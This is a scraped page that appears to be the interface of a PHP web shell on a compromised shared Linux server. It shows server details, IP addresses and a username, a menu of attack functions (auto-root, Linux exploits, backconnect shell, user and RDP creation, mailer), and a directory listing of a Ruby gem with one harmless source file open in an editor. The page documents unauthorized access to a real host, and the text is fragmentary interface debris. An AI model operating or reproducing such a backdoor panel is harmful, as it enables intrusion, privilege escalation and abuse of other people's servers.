Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
lib /
ruby /
vendor_ruby /
jbuilder /
[ HOME SHELL ]
Name
Size
Permission
Action
blank.rb
131
B
-rw-r--r--
dependency_tracker.rb
1.68
KB
-rw-r--r--
errors.rb
578
B
-rw-r--r--
jbuilder.rb
187
B
-rw-r--r--
jbuilder_template.rb
6.68
KB
-rw-r--r--
key_formatter.rb
685
B
-rw-r--r--
railtie.rb
994
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : key_formatter.rb
require 'jbuilder/jbuilder' require 'active_support/core_ext/array' class Jbuilder class KeyFormatter def initialize(*args) @format = {} @cache = {} options = args.extract_options! args.each do |name| @format[name] = [] end options.each do |name, parameters| @format[name] = parameters end end def initialize_copy(original) @cache = {} end def format(key) @cache[key] ||= @format.inject(key.to_s) do |result, args| func, args = args if ::Proc === func func.call result, *args else result.send func, *args end end end end end
Close